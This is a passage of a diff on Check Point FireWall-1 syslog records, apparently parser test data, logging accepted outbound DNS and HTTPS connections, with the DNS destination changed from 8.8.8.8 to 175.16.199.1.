FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52654"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44484"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52654"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44484"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58870"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32812"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54337"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54337"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504930"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38126"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38269"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49772"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504931"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38269"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54548"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52036"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38232"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52036"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38232"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36940"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33428"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56200"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33428"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
